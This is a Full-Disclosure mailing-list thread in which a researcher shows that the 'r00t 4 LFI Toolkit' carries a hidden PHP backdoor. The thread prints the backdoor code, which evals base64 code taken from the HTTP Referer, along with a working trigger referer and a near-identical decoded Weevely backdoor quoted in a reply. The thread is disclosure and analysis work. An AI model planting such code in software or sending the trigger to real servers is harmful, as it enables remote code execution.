A priv8 php shell, funniest thing I've ever heard on this list. On Mon, Feb 20, 2012 at 1:37 PM, Gage Bystrom <[email protected]>wrote:
> Uhh no, you misread what he said. He's saying he's seen that code in a few > php shells that were supposedly meant to be private but the authors were > miserable failures and he found the code anyways, not that he wrote it. > On Feb 20, 2012 12:36 AM, "Manu" <[email protected]> wrote: > >> But you saw it in a few """priv8""" php shells? And you say that is your >> code as 'r00t 4 LFI toolkit' ? Pathetic >> >> >> 2012/2/19 InterN0T Advisories <[email protected]> >> >>> Thank you for the response, I didn't know it was included in the Weevely >>> tool, but I did see it used in a few "priv8" PHP shells too. >>> >>> On Sun, 19 Feb 2012 19:32:13 +0200, Anestis Bechtsoudis >>> <[email protected]> wrote: >>> > The backdoor PHP code that you included is exactly the same as >>> generated >>> > by Weevely [1] tool, until the 0.4 version of the tool. >>> > >>> > For convenience I include the base64 decoded Weevely code here too: >>> > >>> > ini_set('error_log','/dev/null'); >>> > parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='my' && >>> > count($a)==9) {echo '<pass>';eval(base64_decode(str_replace(" ", "+", >>> > join(array_slice($a,count($a)-3)))));echo '</pass>';} >>> > >>> > >>> > For more details you can refer at a relevant post I wrote recently [2]. >>> > >>> > I haven't dig into "r00t 4 LFI" source code, but from your analysis the >>> > similarities are pretty obvious. >>> > >>> > ps: This email has been BCC'ed to Weevely developer. >>> > >>> > >>> > [1] http://code.google.com/p/weevely/ >>> > [2] >>> https://bechtsoudis.com/security/put-weevely-on-the-your-nids-radar/ >>> > >>> > >>> > On 02/19/2012 07:01 PM, InterN0T Advisories wrote: >>> >> Dear Full Disclosure readers, >>> >> >>> >> >>> >> Today I saw Joe McCray among others, tweet about the (new) "r00t 4 LFI >>> >> Toolkit", that according to its description: >>> >> ------------------------------------------- >>> >> This tool is a php script that assists in performing local file >>> inclusion >>> >> attacks. >>> >> ------------------------------------------- >>> >> >>> >>>> Should be able to perform local file inclusion attacks. >>> >> >>> >> >>> >> -:: Overview ::- >>> >> >>> >> After studying this tool for a brief 5 minutes, it was obvious that it >>> >> was >>> >> nowhere what I hoped it to be, as the tool only use one method, the >>> >> "/proc/self/environ" vector (as seen on e.g., the intern0t forums and >>> >> many >>> >> other sites). >>> >> >>> >> The tool is therefore, not capable of performing "attacks", but only >>> 1, >>> >> single type of LFI attack. (Note that the 'S' has been removed.) >>> >> >>> >> The method this tool uses, is far from new and doesn't always work >>> >> either, >>> >> but it's a nice trick that e.g., SirGod wrote about on the intern0t >>> >> forums >>> >> in 2009. (This tool was released the 18th February 2012.) >>> >> >>> >> >>> >> -:: Vulnerabilities ::- >>> >> >>> >> Further study of this tool reveals: >>> >> - None of the output from the tool is sanitized, meaning the attacker >>> >> using the script, can get XSS'd (and CSRF'd), if the target has >>> changed >>> >> e.g., the 'uname -a' command (which is relatively simple to do), to >>> >> include >>> >> (print) JavaScript instead. If this happens, the attacker may end up >>> >> attacking himself, crashing or something third, depending on the type >>> of >>> >> XSS payload. >>> >> >>> >> - The most interesting part, is on line 92, where the "developer" >>> >> (KedAns-Dz), has decided to >>backdoor<< the tool. >>> >> >>> >> >>> >> -:: The Backdoor ::- >>> >> >>> >> Analysis of the backdoor: >>> >> By sending a HTTP request, that includes a specially crafted referer, >>> it >>> >> is possible to execute PHP code: >>> >> ------------------------------------------- >>> >> Referer: a1=iz&a2=&a3=&a4=&a5=&a6=&a7=&a8=&a0=cGhwaW5mbygpOw== >>> >> ------------------------------------------- >>> >> >>> >> >>> >> This referer will make the script execute: phpinfo(); >>> >> >>> >> >>> >> -:: Code Review ::- >>> >> >>> >> The code that enables the developer to use the script as a backdoor >>> looks >>> >> like the following: >>> >> ------------------------------------------- >>> >> parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='iz' && >>> >> count($a)==9) { echo '<star>';eval(base64_decode(str_replace(" ", "+", >>> >> join(array_slice($a,count($a)-3)))));echo '</star>';} >>> >> ------------------------------------------- >>> >> >>> >> >>> >> It certainly took a little bit of study to trigger, but in essence >>> here's >>> >> what it do: >>> >> 1. Parse the HTTP Referer string into variable: $a ("Referer:" is not >>> >> included.) >>> >> 2. If the first array value (not key / arg), is a string named: iz >>> >> 3. And if there's 9 (different) arrays, then >>> >> 4. Print out the contents of.. >>> >> >>> >> >>> >> This requires a bit more in-depth explanation: >>> >> A) Evaluate the following as PHP code: >>> >> B) Base64_decode the input: >>> >> C) Replace " " (space) with "+" (plus), in case they occur. >>> >> D) Use the last three array values from the HTTP referer. >>> >> (You don't have to use all three, using the last will work fine.) >>> >> >>> >> >>> >> To make it all a lot more simple: >>> >> ------------------------------------------- >>> >> >>> >>> Referer:Array1=iz&Array2=&Array3=&Array4=&Array5=&Array6=&Array7=&Array8=&Array0=[BASE64 >>> >> Code that will be executed as PHP.] >>> >> ------------------------------------------- >>> >> >>> >> >>> >> Screenshot: >>> >> http://i.imgur.com/PXcSX.png >>> >> >>> >> >>> >> References: >>> >> >>> >>> http://forum.intern0t.org/offensive-guides-information/4113-analysis-r00t-4-local-file-inclusion-toolkit.html >>> >> >>> >>> http://forum.intern0t.org/general-hacking-discussions/1258-shell-via-local-file-inclusion-proc-self-environ-method-step-step.html >>> >> http://packetstormsecurity.org/files/109940/ >>> >> https://twitter.com/#!/j0emccray/status/170941195030233090 >>> >> https://twitter.com/#!/EChavarro/status/170941489629761537 >>> >> http://i.imgur.com/PXcSX.png >>> >> >>> >> >>> >> >>> >> Best regards, >>> >> MaXe >>> >> >>> >> _______________________________________________ >>> >> Full-Disclosure - We believe in it. >>> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> >> Hosted and sponsored by Secunia - http://secunia.com/ >>> >>> _______________________________________________ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >>> >> >> >> >> -- >> /Manu~ >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
